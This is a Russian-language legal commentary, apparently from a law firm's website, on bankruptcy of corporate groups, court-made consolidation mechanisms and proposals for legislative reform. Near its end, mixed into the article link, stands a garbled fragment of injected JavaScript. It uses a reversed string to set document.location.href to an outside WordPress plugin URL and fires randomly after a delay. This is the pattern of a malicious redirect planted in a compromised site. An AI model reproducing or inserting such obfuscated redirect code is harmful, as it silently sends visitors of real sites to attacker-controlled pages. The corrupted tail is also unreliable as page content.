Банкротство группы компаний: отечественные механизмы и зарубежный опыт

Комментарий Азата Ахметова, советника Orchards, для Право.ru.

По закону фирмы, которые входят в одну группу, банкротят по отдельности. Но за последние годы в судебной практике выработали механизмы, которые в определенных ситуациях позволяют упрощать банкротство холдингов. Эксперты, опрошенные Право.ру, объяснили, стоит ли реформировать этот правовой институт и какие проблемы с его применением возникают на практике.

Есть ситуации, когда банкротство сразу группы компаний могло бы упростить процедуру и достигнуть ее главной цели — удовлетворить требования кредиторов. Например, когда все предприятия холдинга действуют как единый комплекс, где каждая организация отвечает за производство разных деталей для общего результата. Но в законе нет соответствующих механизмов. В деле «СкладЛогистик» (№ А40-101073/2019) ВС допустил материальную консолидацию. Экономколлегия указала, что членов холдинга нельзя воспринимать как самостоятельных субъектов из-за запутанности внутригрупповых отношений. Азат Ахметов, советник Orchards, отметил, что в этом деле ВС фактически разрешил игнорировать принцип самостоятельности юридического лица. Если есть злоупотребления, для целей банкротства можно рассматривать группы компаний как единое целое.

По мнению Азата Ахметова, необходимо законодательно урегулировать процессуальную консолидацию процедур банкротства. Затем следует вводить в законодательство понятие «материальная консолидация», «процедура банкротства группы компаний».

Это повысит эффективность процедур банкротства компаний, упростит их, сэкономит сроки их производства и позволит увеличить степень удовлетворения требований кредиторов.

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tory/242697/»>Ссылка на статью>>

Подпишитесь на Telegram Orchards

X